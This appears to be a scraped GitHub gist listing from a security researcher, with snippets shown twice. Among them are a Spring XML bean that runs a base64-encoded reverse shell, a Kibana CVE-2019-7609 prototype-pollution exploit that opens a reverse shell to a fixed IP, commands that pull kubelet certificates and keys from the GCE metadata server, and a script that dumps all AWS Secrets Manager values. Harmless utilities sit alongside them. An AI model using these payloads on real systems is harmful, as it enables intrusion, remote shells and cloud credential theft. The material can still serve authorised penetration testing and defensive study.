Robbie random-robbie

## phpobject.php
<?php
/*
Plugin Name: PHP Object Injection Test
Plugin URI: https://www.pluginvulnerabilities.com/
Description: Allows for easy testing of PHP object injection vulnerabilities. Displays message "PHP object injection has occurred." when "O:20:"PHP_Object_Injection":0:{}" is unserialized.
Version: 1.0
Author: White Fir Design
Author URI: https://www.pluginvulnerabilities.com/
License: GPLv2

## exploit.xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTMwLzQ0NDQgMD4mMQ== | base64 -d | bash]]></value>

## wp-scan.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                random-robbie
                / wp-scan.md
            
            
              Last active Oct 20, 2020
            
          
      View wp-scan.md
  
    
    _______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team


## gce-to-master.txt
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_CERT | awk '{print $2}' | base64 -d > kubelet.crt
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_KEY | awk '{print $2}' | base64 -d > kubelet.key
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt

## secrets-dump.sh
#!/bin/bash
for sec in `aws secretsmanager list-secrets | jq -r '.SecretList[].Name'`; do
        aws secretsmanager get-secret-value --secret-id $sec
done

## elastic-juice.sh
#!/bin/bash
for env in `aws elasticbeanstalk describe-environments | jq -r '.Environments[].EnvironmentName'`; do
        aws elasticbeanstalk retrieve-environment-info --environment-name $env --info-type tail
done

## convert.sh
#!/bin/bash
for picture in *.webp ; do
 new=$(echo $picture | sed 's/\.[^.]*$//')
 dwebp $picture -o $new.png
done

## CVE-2019-7609.py
import requests

session = requests.Session()

cmd = "bash -i >& /dev/tcp/192.168.0.136/12345 0>&1"
rawBody = "{\"sheet\":[\".es(*).props(label.__proto__.env.AAAA='require(\\\"child_process\\\").exec(\\\""+cmd+"\\\");process.exit()//')\\n.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')\"],\"time\":{\"from\":\"now-15m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Europe/London\"}}"
headers = {"Origin":""+KIB_URL+"","Accept":"application/json, text/plain, */*","kbn-version":"6.7.0","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":""+KIB_URL+"/_plugin/kibana/app/timelion","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/json;charset=utf-8"}
response = session.post(""+KIB_URL+"/_plugin/kibana/api/timelion/run", data=rawBody, headers=headers)

print("Status code:   %i" % response.status_code)

## wordlist.txt
20-ev-allgemein
20-years
200
2000
20000719
2001
2001cc
2002
2003

## removejobs.sh
#!/bin/bash
for job in `cat $1`; do
	curl -XPOST https://api.binaryedge.io/v1/tasks/$job/revoke -H  'X-Token:YOURBINARYEDGETOKEN'
done
	<?php
	/*
	Plugin Name: PHP Object Injection Test
	Plugin URI: https://www.pluginvulnerabilities.com/
	Description: Allows for easy testing of PHP object injection vulnerabilities. Displays message "PHP object injection has occurred." when "O:20:"PHP_Object_Injection":0:{}" is unserialized.
	Version: 1.0
	Author: White Fir Design
	Author URI: https://www.pluginvulnerabilities.com/
	License: GPLv2
	<?xml version="1.0" encoding="UTF-8" ?>
	<beans xmlns="http://www.springframework.org/schema/beans"
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
	<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
	<constructor-arg>
	<list>
	<value>bash</value>
	<value>-c</value>
	<value><![CDATA[echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTMwLzQ0NDQgMD4mMQ== \| base64 -d \| bash]]></value>
	curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' \| grep ^KUBELET_CERT \| awk '{print $2}' \| base64 -d > kubelet.crt
	curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' \| grep ^KUBELET_KEY \| awk '{print $2}' \| base64 -d > kubelet.key
	curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' \| grep ^CA_CERT \| awk '{print $2}' \| base64 -d > apiserver.crt
	#!/bin/bash
	for sec in `aws secretsmanager list-secrets \| jq -r '.SecretList[].Name'`; do
	aws secretsmanager get-secret-value --secret-id $sec
	done
	#!/bin/bash
	for env in `aws elasticbeanstalk describe-environments \| jq -r '.Environments[].EnvironmentName'`; do
	aws elasticbeanstalk retrieve-environment-info --environment-name $env --info-type tail
	done
	#!/bin/bash
	for picture in *.webp ; do
	new=$(echo $picture \| sed 's/\.[^.]*$//')
	dwebp $picture -o $new.png
	done
	import requests

	session = requests.Session()

	cmd = "bash -i >& /dev/tcp/192.168.0.136/12345 0>&1"
	rawBody = "{\"sheet\":[\".es(*).props(label.__proto__.env.AAAA='require(\\\"child_process\\\").exec(\\\""+cmd+"\\\");process.exit()//')\\n.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')\"],\"time\":{\"from\":\"now-15m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Europe/London\"}}"
	headers = {"Origin":""+KIB_URL+"","Accept":"application/json, text/plain, /","kbn-version":"6.7.0","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":""+KIB_URL+"/_plugin/kibana/app/timelion","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/json;charset=utf-8"}
	response = session.post(""+KIB_URL+"/_plugin/kibana/api/timelion/run", data=rawBody, headers=headers)

	print("Status code: %i" % response.status_code)
	#!/bin/bash
	for job in `cat $1`; do
	curl -XPOST https://api.binaryedge.io/v1/tasks/$job/revoke -H 'X-Token:YOURBINARYEDGETOKEN'
	done